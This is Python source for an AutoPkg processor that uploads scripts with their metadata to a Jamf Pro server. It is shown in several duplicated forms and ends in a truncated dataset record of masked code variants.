self.replace = self.env.get('replace_script')
self.sleep = self.env.get('sleep')
if not self.replace or self.replace == 'False':
self.replace = False
if 'jamfscriptuploader_summary_result' in self.env:
del self.env['jamfscriptuploader_summary_result']
script_uploaded = False
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.
jamf_password)
if self.script_category:
self.output('Checking categories for {}'.format(self.
script_category))
obj_type = 'category'
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(self.jamf_url,
obj_type, obj_name, token)
if not category_id:
self.output('WARNING: Category not found!')
category_id = '-1'
else:
self.output('Category {} found: ID={}'.format(self.
script_category, category_id))
else:
self.script_category = ''
category_id = '-1'
if not self.script_path.startswith('/'):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(
f'ERROR: Script file {self.script_path} not found')
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
self.output("Checking for existing '{}' on {}".format(self.
script_name, self.jamf_url))
self.output('Full path: {}'.format(self.script_path), verbose_level=2)
obj_type = 'script'
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,
obj_name, token)
if obj_id:
self.output("Script '{}' already exists: ID {}".format(self.
script_name, obj_id))
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}"
.format(self.replace), verbose_level=1)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce."
, verbose_level=1)
return
self.upload_script(self.jamf_url, self.script_name, self.
script_path, category_id, self.script_category, self.
script_info, self.script_notes, self.script_priority, self.
script_parameter4, self.script_parameter5, self.
script_parameter6, self.script_parameter7, self.
script_parameter8, self.script_parameter9, self.
script_parameter10, self.script_parameter11, self.
osrequirements, token, obj_id)
script_uploaded = True
self.env['script_name'] = self.script_name
self.env['script_uploaded'] = script_uploaded
if script_uploaded:
self.env['jamfscriptuploader_summary_result'] = {'summary_text':
'The following scripts were created or updated in Jamf Pro:',
'report_fields': ['script', 'path', 'category', 'priority',
'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',
'P9', 'P10', 'P11'], 'data': {'script': self.script_name,
'path': self.script_path, 'category': self.script_category,
'priority': str(self.script_priority), 'info': self.
script_info, 'os_req': self.osrequirements, 'notes': self.
script_notes, 'P4': self.script_parameter4, 'P5': self.
script_parameter5, 'P6': self.script_parameter6, 'P7': self
.script_parameter7, 'P8': self.script_parameter8, 'P9':
self.script_parameter9, 'P10': self.script_parameter10,
'P11': self.script_parameter11}}
if __name__ == '__main__':
PROCESSOR = JamfScriptUploader()
PROCESSOR.execute_shell()
<|reserved_special_token_1|>
#!/usr/local/autopkg/python
"""
JamfScriptUploader processor for uploading items to Jamf Pro using AutoPkg
by G Pugh
"""
import os.path
import sys
from time import sleep
from autopkglib import ProcessorError # pylint: disable=import-error
# to use a base module in AutoPkg we need to add this path to the sys.path.
# this violates flake8 E402 (PEP8 imports) but is unavoidable, so the following
# imports require noqa comments for E402
sys.path.insert(0, os.path.dirname(__file__))
from JamfUploaderLib.JamfUploaderBase import JamfUploaderBase # noqa: E402
__all__ = ["JamfScriptUploader"]
class JamfScriptUploader(JamfUploaderBase):
description = (
"A processor for AutoPkg that will upload a script to a Jamf Cloud or "
"on-prem server."
)
input_variables = {
"JSS_URL": {
"required": True,
"description": "URL to a Jamf Pro server that the API user has write access "
"to, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_USERNAME": {
"required": True,
"description": "Username of account with appropriate access to "
"jss, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_PASSWORD": {
"required": True,
"description": "Password of api user, optionally set as a key in "
"the com.github.autopkg preference file.",
},
"script_path": {
"required": False,
"description": "Full path to the script to be uploaded",
},
"script_name": {
"required": False,
"description": "Name of the script in Jamf",
},
"script_category": {
"required": False,
"description": "Script category",
"default": "",
},
"script_priority": {
"required": False,
"description": "Script priority (BEFORE or AFTER)",
"default": "AFTER",
},
"osrequirements": {
"required": False,
"description": "Script OS requirements",
"default": "",
},
"script_info": {
"required": False,
"description": "Script info field",
"default": "",
},
"script_notes": {
"required": False,
"description": "Script notes field",
"default": "",
},
"script_parameter4": {
"required": False,
"description": "Script parameter 4 title",
"default": "",
},
"script_parameter5": {
"required": False,
"description": "Script parameter 5 title",
"default": "",
},
"script_parameter6": {
"required": False,
"description": "Script parameter 6 title",
"default": "",
},
"script_parameter7": {
"required": False,
"description": "Script parameter 7 title",
"default": "",
},
"script_parameter8": {
"required": False,
"description": "Script parameter 8 title",
"default": "",
},
"script_parameter9": {
"required": False,
"description": "Script parameter 9 title",
"default": "",
},
"script_parameter10": {
"required": False,
"description": "Script parameter 10 title",
"default": "",
},
"script_parameter11": {
"required": False,
"description": "Script parameter 11 title",
"default": "",
},
"replace_script": {
"required": False,
"description": "Overwrite an existing script if True.",
"default": False,
},
"sleep": {
"required": False,
"description": "Pause after running this processor for specified seconds.",
"default": "0",
},
}
output_variables = {
"script_name": {
"required": False,
"description": "Name of the uploaded script",
},
"jamfscriptuploader_summary_result": {
"description": "Description of interesting results.",
},
}
def upload_script(
self,
jamf_url,
script_name,
script_path,
category_id,
script_category,
script_info,
script_notes,
script_priority,
script_parameter4,
script_parameter5,
script_parameter6,
script_parameter7,
script_parameter8,
script_parameter9,
script_parameter10,
script_parameter11,
script_os_requirements,
token,
obj_id=0,
):
"""Update script metadata."""
# import script from file and replace any keys in the script
if os.path.exists(script_path):
with open(script_path, "r") as file:
script_contents = file.read()
else:
raise ProcessorError("Script does not exist!")
# substitute user-assignable keys
script_contents = self.substitute_assignable_keys(script_contents)
# priority has to be in upper case. Let's make it nice for the user
if script_priority:
script_priority = script_priority.upper()
# build the object
script_data = {
"name": script_name,
"info": script_info,
"notes": script_notes,
"priority": script_priority,
"categoryId": category_id,
"categoryName": script_category,
"parameter4": script_parameter4,
"parameter5": script_parameter5,
"parameter6": script_parameter6,
"parameter7": script_parameter7,
"parameter8": script_parameter8,
"parameter9": script_parameter9,
"parameter10": script_parameter10,
"parameter11": script_parameter11,
"osRequirements": script_os_requirements,
"scriptContents": script_contents,
}
self.output(
"Script data:",
verbose_level=2,
)
self.output(
script_data,
verbose_level=2,
)
script_json = self.write_json_file(script_data)
self.output("Uploading script..")
# if we find an object ID we put, if not, we post
object_type = "script"
if obj_id:
url = "{}/{}/{}".format(jamf_url, self.api_endpoints(object_type), obj_id)
else:
url = "{}/{}".format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output(
"Script upload attempt {}".format(count),
verbose_level=2,
)
request = "PUT" if obj_id else "POST"
r = self.curl(request=request, url=url, token=token, data=script_json)
# check HTTP response
if self.status_check(r, "Script", script_name, request) == "break":
break
if count > 5:
self.output("Script upload did not succeed after 5 attempts")
self.output("\nHTTP POST Response Code: {}".format(r.status_code))
raise ProcessorError("ERROR: Script upload failed ")
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get("JSS_URL")
self.jamf_user = self.env.get("API_USERNAME")
self.jamf_password = self.env.get("API_PASSWORD")
self.script_path = self.env.get("script_path")
self.script_name = self.env.get("script_name")
self.script_category = self.env.get("script_category")
self.script_priority = self.env.get("script_priority")
self.osrequirements = self.env.get("osrequirements")
self.script_info = self.env.get("script_info")
self.script_notes = self.env.get("script_notes")
self.script_parameter4 = self.env.get("script_parameter4")
self.script_parameter5 = self.env.get("script_parameter5")
self.script_parameter6 = self.env.get("script_parameter6")
self.script_parameter7 = self.env.get("script_parameter7")
self.script_parameter8 = self.env.get("script_parameter8")
self.script_parameter9 = self.env.get("script_parameter9")
self.script_parameter10 = self.env.get("script_parameter10")
self.script_parameter11 = self.env.get("script_parameter11")
self.replace = self.env.get("replace_script")
self.sleep = self.env.get("sleep")
# handle setting replace in overrides
if not self.replace or self.replace == "False":
self.replace = False
# clear any pre-existing summary result
if "jamfscriptuploader_summary_result" in self.env:
del self.env["jamfscriptuploader_summary_result"]
script_uploaded = False
# obtain the relevant credentials
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.jamf_password)
# get the id for a category if supplied
if self.script_category:
self.output("Checking categories for {}".format(self.script_category))
# check for existing category - requires obj_name
obj_type = "category"
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(
self.jamf_url,
obj_type,
obj_name,
token,
)
if not category_id:
self.output("WARNING: Category not found!")
category_id = "-1"
else:
self.output(
"Category {} found: ID={}".format(self.script_category, category_id)
)
else:
self.script_category = ""
category_id = "-1"
# handle files with a relative path
if not self.script_path.startswith("/"):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(f"ERROR: Script file {self.script_path} not found")
# now start the process of uploading the object
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
# check for existing script
self.output(
"Checking for existing '{}' on {}".format(self.script_name, self.jamf_url)
)
self.output(
"Full path: {}".format(self.script_path),
verbose_level=2,
)
obj_type = "script"
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(
self.jamf_url,
obj_type,
obj_name,
token,
)
if obj_id:
self.output(
"Script '{}' already exists: ID {}".format(self.script_name, obj_id)
)
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}".format(
self.replace
),
verbose_level=1,
)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce.",
verbose_level=1,
)
return
# post the script
self.upload_script(
self.jamf_url,
self.script_name,
self.script_path,
category_id,
self.script_category,
self.script_info,
self.script_notes,
self.script_priority,
self.script_parameter4,
self.script_parameter5,
self.script_parameter6,
self.script_parameter7,
self.script_parameter8,
self.script_parameter9,
self.script_parameter10,
self.script_parameter11,
self.osrequirements,
token,
obj_id,
)
script_uploaded = True
# output the summary
self.env["script_name"] = self.script_name
self.env["script_uploaded"] = script_uploaded
if script_uploaded:
self.env["jamfscriptuploader_summary_result"] = {
"summary_text": "The following scripts were created or updated in Jamf Pro:",
"report_fields": [
"script",
"path",
"category",
"priority",
"os_req",
"info",
"notes",
"P4",
"P5",
"P6",
"P7",
"P8",
"P9",
"P10",
"P11",
],
"data": {
"script": self.script_name,
"path": self.script_path,
"category": self.script_category,
"priority": str(self.script_priority),
"info": self.script_info,
"os_req": self.osrequirements,
"notes": self.script_notes,
"P4": self.script_parameter4,
"P5": self.script_parameter5,
"P6": self.script_parameter6,
"P7": self.script_parameter7,
"P8": self.script_parameter8,
"P9": self.script_parameter9,
"P10": self.script_parameter10,
"P11": self.script_parameter11,
},
}
if __name__ == "__main__":
PROCESSOR = JamfScriptUploader()
PROCESSOR.execute_shell()
|
flexible
|
{
"blob_id": "35d99713df754052a006f76bb6f3cfe9cf875c0b",
"index": 3993,
"step-1": "<mask token>\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n 'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'\n )\n input_variables = {'JSS_URL': {'required': True, 'description':\n 'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_USERNAME': {'required': True, 'description':\n 'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_PASSWORD': {'required': True, 'description':\n 'Password of api user, optionally set as a key in the com.github.autopkg preference file.'\n }, 'script_path': {'required': False, 'description':\n 'Full path to the script to be uploaded'}, 'script_name': {\n 'required': False, 'description': 'Name of the script in Jamf'},\n 'script_category': {'required': False, 'description':\n 'Script category', 'default': ''}, 'script_priority': {'required': \n False, 'description': 'Script priority (BEFORE or AFTER)',\n 'default': 'AFTER'}, 'osrequirements': {'required': False,\n 'description': 'Script OS requirements', 'default': ''},\n 'script_info': {'required': False, 'description':\n 'Script info field', 'default': ''}, 'script_notes': {'required': \n False, 'description': 'Script notes field', 'default': ''},\n 'script_parameter4': {'required': False, 'description':\n 'Script parameter 4 title', 'default': ''}, 'script_parameter5': {\n 'required': False, 'description': 'Script parameter 5 title',\n 'default': ''}, 'script_parameter6': {'required': False,\n 'description': 'Script parameter 6 title', 'default': ''},\n 'script_parameter7': {'required': False, 'description':\n 'Script parameter 7 title', 'default': ''}, 'script_parameter8': {\n 'required': False, 'description': 'Script parameter 8 title',\n 'default': ''}, 'script_parameter9': {'required': False,\n 'description': 'Script parameter 9 title', 'default': ''},\n 'script_parameter10': {'required': False, 'description':\n 'Script parameter 10 title', 'default': ''}, 'script_parameter11':\n {'required': False, 'description': 'Script parameter 11 title',\n 'default': ''}, 'replace_script': {'required': False, 'description':\n 'Overwrite an existing script if True.', 'default': False}, 'sleep':\n {'required': False, 'description':\n 'Pause after running this processor for specified seconds.',\n 'default': '0'}}\n output_variables = {'script_name': {'required': False, 'description':\n 'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':\n {'description': 'Description of interesting results.'}}\n\n def upload_script(self, jamf_url, script_name, script_path, category_id,\n script_category, script_info, script_notes, script_priority,\n script_parameter4, script_parameter5, script_parameter6,\n script_parameter7, script_parameter8, script_parameter9,\n script_parameter10, script_parameter11, script_os_requirements,\n token, obj_id=0):\n \"\"\"Update script metadata.\"\"\"\n if os.path.exists(script_path):\n with open(script_path, 'r') as file:\n script_contents = file.read()\n else:\n raise ProcessorError('Script does not exist!')\n script_contents = self.substitute_assignable_keys(script_contents)\n if script_priority:\n script_priority = script_priority.upper()\n script_data = {'name': script_name, 'info': script_info, 'notes':\n script_notes, 'priority': script_priority, 'categoryId':\n category_id, 'categoryName': script_category, 'parameter4':\n script_parameter4, 'parameter5': script_parameter5,\n 'parameter6': script_parameter6, 'parameter7':\n script_parameter7, 'parameter8': script_parameter8,\n 'parameter9': script_parameter9, 'parameter10':\n script_parameter10, 'parameter11': script_parameter11,\n 'osRequirements': script_os_requirements, 'scriptContents':\n script_contents}\n self.output('Script data:', verbose_level=2)\n self.output(script_data, verbose_level=2)\n script_json = self.write_json_file(script_data)\n self.output('Uploading script..')\n object_type = 'script'\n if obj_id:\n url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(\n object_type), obj_id)\n else:\n url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))\n count = 0\n while True:\n count += 1\n self.output('Script upload attempt {}'.format(count),\n verbose_level=2)\n request = 'PUT' if obj_id else 'POST'\n r = self.curl(request=request, url=url, token=token, data=\n script_json)\n if self.status_check(r, 'Script', script_name, request) == 'break':\n break\n if count > 5:\n self.output('Script upload did not succeed after 5 attempts')\n self.output('\\nHTTP POST Response Code: {}'.format(r.\n status_code))\n raise ProcessorError('ERROR: Script upload failed ')\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get('JSS_URL')\n self.jamf_user = self.env.get('API_USERNAME')\n self.jamf_password = self.env.get('API_PASSWORD')\n self.script_path = self.env.get('script_path')\n self.script_name = self.env.get('script_name')\n self.script_category = self.env.get('script_category')\n self.script_priority = self.env.get('script_priority')\n self.osrequirements = self.env.get('osrequirements')\n self.script_info = self.env.get('script_info')\n self.script_notes = self.env.get('script_notes')\n self.script_parameter4 = self.env.get('script_parameter4')\n self.script_parameter5 = self.env.get('script_parameter5')\n self.script_parameter6 = self.env.get('script_parameter6')\n self.script_parameter7 = self.env.get('script_parameter7')\n self.script_parameter8 = self.env.get('script_parameter8')\n self.script_parameter9 = self.env.get('script_parameter9')\n self.script_parameter10 = self.env.get('script_parameter10')\n self.script_parameter11 = self.env.get('script_parameter11')\n self.replace = self.env.get('replace_script')\n self.sleep = self.env.get('sleep')\n if not self.replace or self.replace == 'False':\n self.replace = False\n if 'jamfscriptuploader_summary_result' in self.env:\n del self.env['jamfscriptuploader_summary_result']\n script_uploaded = False\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.\n jamf_password)\n if self.script_category:\n self.output('Checking categories for {}'.format(self.\n script_category))\n obj_type = 'category'\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(self.jamf_url,\n obj_type, obj_name, token)\n if not category_id:\n self.output('WARNING: Category not found!')\n category_id = '-1'\n else:\n self.output('Category {} found: ID={}'.format(self.\n script_category, category_id))\n else:\n self.script_category = ''\n category_id = '-1'\n if not self.script_path.startswith('/'):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(\n f'ERROR: Script file {self.script_path} not found')\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n self.output(\"Checking for existing '{}' on {}\".format(self.\n script_name, self.jamf_url))\n self.output('Full path: {}'.format(self.script_path), verbose_level=2)\n obj_type = 'script'\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,\n obj_name, token)\n if obj_id:\n self.output(\"Script '{}' already exists: ID {}\".format(self.\n script_name, obj_id))\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\"\n .format(self.replace), verbose_level=1)\n else:\n self.output(\n \"Not replacing existing script. Use replace_script='True' to enforce.\"\n , verbose_level=1)\n return\n self.upload_script(self.jamf_url, self.script_name, self.\n script_path, category_id, self.script_category, self.\n script_info, self.script_notes, self.script_priority, self.\n script_parameter4, self.script_parameter5, self.\n script_parameter6, self.script_parameter7, self.\n script_parameter8, self.script_parameter9, self.\n script_parameter10, self.script_parameter11, self.\n osrequirements, token, obj_id)\n script_uploaded = True\n self.env['script_name'] = self.script_name\n self.env['script_uploaded'] = script_uploaded\n if script_uploaded:\n self.env['jamfscriptuploader_summary_result'] = {'summary_text':\n 'The following scripts were created or updated in Jamf Pro:',\n 'report_fields': ['script', 'path', 'category', 'priority',\n 'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',\n 'P9', 'P10', 'P11'], 'data': {'script': self.script_name,\n 'path': self.script_path, 'category': self.script_category,\n 'priority': str(self.script_priority), 'info': self.\n script_info, 'os_req': self.osrequirements, 'notes': self.\n script_notes, 'P4': self.script_parameter4, 'P5': self.\n script_parameter5, 'P6': self.script_parameter6, 'P7': self\n .script_parameter7, 'P8': self.script_parameter8, 'P9':\n self.script_parameter9, 'P10': self.script_parameter10,\n 'P11': self.script_parameter11}}\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.insert(0, os.path.dirname(__file__))\n<mask token>\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n 'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'\n )\n input_variables = {'JSS_URL': {'required': True, 'description':\n 'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_USERNAME': {'required': True, 'description':\n 'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_PASSWORD': {'required': True, 'description':\n 'Password of api user, optionally set as a key in the com.github.autopkg preference file.'\n }, 'script_path': {'required': False, 'description':\n 'Full path to the script to be uploaded'}, 'script_name': {\n 'required': False, 'description': 'Name of the script in Jamf'},\n 'script_category': {'required': False, 'description':\n 'Script category', 'default': ''}, 'script_priority': {'required': \n False, 'description': 'Script priority (BEFORE or AFTER)',\n 'default': 'AFTER'}, 'osrequirements': {'required': False,\n 'description': 'Script OS requirements', 'default': ''},\n 'script_info': {'required': False, 'description':\n 'Script info field', 'default': ''}, 'script_notes': {'required': \n False, 'description': 'Script notes field', 'default': ''},\n 'script_parameter4': {'required': False, 'description':\n 'Script parameter 4 title', 'default': ''}, 'script_parameter5': {\n 'required': False, 'description': 'Script parameter 5 title',\n 'default': ''}, 'script_parameter6': {'required': False,\n 'description': 'Script parameter 6 title', 'default': ''},\n 'script_parameter7': {'required': False, 'description':\n 'Script parameter 7 title', 'default': ''}, 'script_parameter8': {\n 'required': False, 'description': 'Script parameter 8 title',\n 'default': ''}, 'script_parameter9': {'required': False,\n 'description': 'Script parameter 9 title', 'default': ''},\n 'script_parameter10': {'required': False, 'description':\n 'Script parameter 10 title', 'default': ''}, 'script_parameter11':\n {'required': False, 'description': 'Script parameter 11 title',\n 'default': ''}, 'replace_script': {'required': False, 'description':\n 'Overwrite an existing script if True.', 'default': False}, 'sleep':\n {'required': False, 'description':\n 'Pause after running this processor for specified seconds.',\n 'default': '0'}}\n output_variables = {'script_name': {'required': False, 'description':\n 'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':\n {'description': 'Description of interesting results.'}}\n\n def upload_script(self, jamf_url, script_name, script_path, category_id,\n script_category, script_info, script_notes, script_priority,\n script_parameter4, script_parameter5, script_parameter6,\n script_parameter7, script_parameter8, script_parameter9,\n script_parameter10, script_parameter11, script_os_requirements,\n token, obj_id=0):\n \"\"\"Update script metadata.\"\"\"\n if os.path.exists(script_path):\n with open(script_path, 'r') as file:\n script_contents = file.read()\n else:\n raise ProcessorError('Script does not exist!')\n script_contents = self.substitute_assignable_keys(script_contents)\n if script_priority:\n script_priority = script_priority.upper()\n script_data = {'name': script_name, 'info': script_info, 'notes':\n script_notes, 'priority': script_priority, 'categoryId':\n category_id, 'categoryName': script_category, 'parameter4':\n script_parameter4, 'parameter5': script_parameter5,\n 'parameter6': script_parameter6, 'parameter7':\n script_parameter7, 'parameter8': script_parameter8,\n 'parameter9': script_parameter9, 'parameter10':\n script_parameter10, 'parameter11': script_parameter11,\n 'osRequirements': script_os_requirements, 'scriptContents':\n script_contents}\n self.output('Script data:', verbose_level=2)\n self.output(script_data, verbose_level=2)\n script_json = self.write_json_file(script_data)\n self.output('Uploading script..')\n object_type = 'script'\n if obj_id:\n url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(\n object_type), obj_id)\n else:\n url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))\n count = 0\n while True:\n count += 1\n self.output('Script upload attempt {}'.format(count),\n verbose_level=2)\n request = 'PUT' if obj_id else 'POST'\n r = self.curl(request=request, url=url, token=token, data=\n script_json)\n if self.status_check(r, 'Script', script_name, request) == 'break':\n break\n if count > 5:\n self.output('Script upload did not succeed after 5 attempts')\n self.output('\\nHTTP POST Response Code: {}'.format(r.\n status_code))\n raise ProcessorError('ERROR: Script upload failed ')\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get('JSS_URL')\n self.jamf_user = self.env.get('API_USERNAME')\n self.jamf_password = self.env.get('API_PASSWORD')\n self.script_path = self.env.get('script_path')\n self.script_name = self.env.get('script_name')\n self.script_category = self.env.get('script_category')\n self.script_priority = self.env.get('script_priority')\n self.osrequirements = self.env.get('osrequirements')\n self.script_info = self.env.get('script_info')\n self.script_notes = self.env.get('script_notes')\n self.script_parameter4 = self.env.get('script_parameter4')\n self.script_parameter5 = self.env.get('script_parameter5')\n self.script_parameter6 = self.env.get('script_parameter6')\n self.script_parameter7 = self.env.get('script_parameter7')\n self.script_parameter8 = self.env.get('script_parameter8')\n self.script_parameter9 = self.env.get('script_parameter9')\n self.script_parameter10 = self.env.get('script_parameter10')\n self.script_parameter11 = self.env.get('script_parameter11')\n self.replace = self.env.get('replace_script')\n self.sleep = self.env.get('sleep')\n if not self.replace or self.replace == 'False':\n self.replace = False\n if 'jamfscriptuploader_summary_result' in self.env:\n del self.env['jamfscriptuploader_summary_result']\n script_uploaded = False\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.\n jamf_password)\n if self.script_category:\n self.output('Checking categories for {}'.format(self.\n script_category))\n obj_type = 'category'\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(self.jamf_url,\n obj_type, obj_name, token)\n if not category_id:\n self.output('WARNING: Category not found!')\n category_id = '-1'\n else:\n self.output('Category {} found: ID={}'.format(self.\n script_category, category_id))\n else:\n self.script_category = ''\n category_id = '-1'\n if not self.script_path.startswith('/'):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(\n f'ERROR: Script file {self.script_path} not found')\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n self.output(\"Checking for existing '{}' on {}\".format(self.\n script_name, self.jamf_url))\n self.output('Full path: {}'.format(self.script_path), verbose_level=2)\n obj_type = 'script'\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,\n obj_name, token)\n if obj_id:\n self.output(\"Script '{}' already exists: ID {}\".format(self.\n script_name, obj_id))\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\"\n .format(self.replace), verbose_level=1)\n else:\n self.output(\n \"Not replacing existing script. Use replace_script='True' to enforce.\"\n , verbose_level=1)\n return\n self.upload_script(self.jamf_url, self.script_name, self.\n script_path, category_id, self.script_category, self.\n script_info, self.script_notes, self.script_priority, self.\n script_parameter4, self.script_parameter5, self.\n script_parameter6, self.script_parameter7, self.\n script_parameter8, self.script_parameter9, self.\n script_parameter10, self.script_parameter11, self.\n osrequirements, token, obj_id)\n script_uploaded = True\n self.env['script_name'] = self.script_name\n self.env['script_uploaded'] = script_uploaded\n if script_uploaded:\n self.env['jamfscriptuploader_summary_result'] = {'summary_text':\n 'The following scripts were created or updated in Jamf Pro:',\n 'report_fields': ['script', 'path', 'category', 'priority',\n 'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',\n 'P9', 'P10', 'P11'], 'data': {'script': self.script_name,\n 'path': self.script_path, 'category': self.script_category,\n 'priority': str(self.script_priority), 'info': self.\n script_info, 'os_req': self.osrequirements, 'notes': self.\n script_notes, 'P4': self.script_parameter4, 'P5': self.\n script_parameter5, 'P6': self.script_parameter6, 'P7': self\n .script_parameter7, 'P8': self.script_parameter8, 'P9':\n self.script_parameter9, 'P10': self.script_parameter10,\n 'P11': self.script_parameter11}}\n\n\nif __name__ == '__main__':\n PROCESSOR = JamfScriptUploader()\n PROCESSOR.execute_shell()\n",
"step-4": "<mask token>\nimport os.path\nimport sys\nfrom time import sleep\nfrom autopkglib import ProcessorError\nsys.path.insert(0, os.path.dirname(__file__))\nfrom JamfUploaderLib.JamfUploaderBase import JamfUploaderBase\n__all__ = ['JamfScriptUploader']\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n 'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'\n )\n input_variables = {'JSS_URL': {'required': True, 'description':\n 'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_USERNAME': {'required': True, 'description':\n 'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_PASSWORD': {'required': True, 'description':\n 'Password of api user, optionally set as a key in the com.github.autopkg preference file.'\n }, 'script_path': {'required': False, 'description':\n 'Full path to the script to be uploaded'}, 'script_name': {\n 'required': False, 'description': 'Name of the script in Jamf'},\n 'script_category': {'required': False, 'description':\n 'Script category', 'default': ''}, 'script_priority': {'required': \n False, 'description': 'Script priority (BEFORE or AFTER)',\n 'default': 'AFTER'}, 'osrequirements': {'required': False,\n 'description': 'Script OS requirements', 'default': ''},\n 'script_info': {'required': False, 'description':\n 'Script info field', 'default': ''}, 'script_notes': {'required': \n False, 'description': 'Script notes field', 'default': ''},\n 'script_parameter4': {'required': False, 'description':\n 'Script parameter 4 title', 'default': ''}, 'script_parameter5': {\n 'required': False, 'description': 'Script parameter 5 title',\n 'default': ''}, 'script_parameter6': {'required': False,\n 'description': 'Script parameter 6 title', 'default': ''},\n 'script_parameter7': {'required': False, 'description':\n 'Script parameter 7 title', 'default': ''}, 'script_parameter8': {\n 'required': False, 'description': 'Script parameter 8 title',\n 'default': ''}, 'script_parameter9': {'required': False,\n 'description': 'Script parameter 9 title', 'default': ''},\n 'script_parameter10': {'required': False, 'description':\n 'Script parameter 10 title', 'default': ''}, 'script_parameter11':\n {'required': False, 'description': 'Script parameter 11 title',\n 'default': ''}, 'replace_script': {'required': False, 'description':\n 'Overwrite an existing script if True.', 'default': False}, 'sleep':\n {'required': False, 'description':\n 'Pause after running this processor for specified seconds.',\n 'default': '0'}}\n output_variables = {'script_name': {'required': False, 'description':\n 'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':\n {'description': 'Description of interesting results.'}}\n\n def upload_script(self, jamf_url, script_name, script_path, category_id,\n script_category, script_info, script_notes, script_priority,\n script_parameter4, script_parameter5, script_parameter6,\n script_parameter7, script_parameter8, script_parameter9,\n script_parameter10, script_parameter11, script_os_requirements,\n token, obj_id=0):\n \"\"\"Update script metadata.\"\"\"\n if os.path.exists(script_path):\n with open(script_path, 'r') as file:\n script_contents = file.read()\n else:\n raise ProcessorError('Script does not exist!')\n script_contents = self.substitute_assignable_keys(script_contents)\n if script_priority:\n script_priority = script_priority.upper()\n script_data = {'name': script_name, 'info': script_info, 'notes':\n script_notes, 'priority': script_priority, 'categoryId':\n category_id, 'categoryName': script_category, 'parameter4':\n script_parameter4, 'parameter5': script_parameter5,\n 'parameter6': script_parameter6, 'parameter7':\n script_parameter7, 'parameter8': script_parameter8,\n 'parameter9': script_parameter9, 'parameter10':\n script_parameter10, 'parameter11': script_parameter11,\n 'osRequirements': script_os_requirements, 'scriptContents':\n script_contents}\n self.output('Script data:', verbose_level=2)\n self.output(script_data, verbose_level=2)\n script_json = self.write_json_file(script_data)\n self.output('Uploading script..')\n object_type = 'script'\n if obj_id:\n url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(\n object_type), obj_id)\n else:\n url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))\n count = 0\n while True:\n count += 1\n self.output('Script upload attempt {}'.format(count),\n verbose_level=2)\n request = 'PUT' if obj_id else 'POST'\n r = self.curl(request=request, url=url, token=token, data=\n 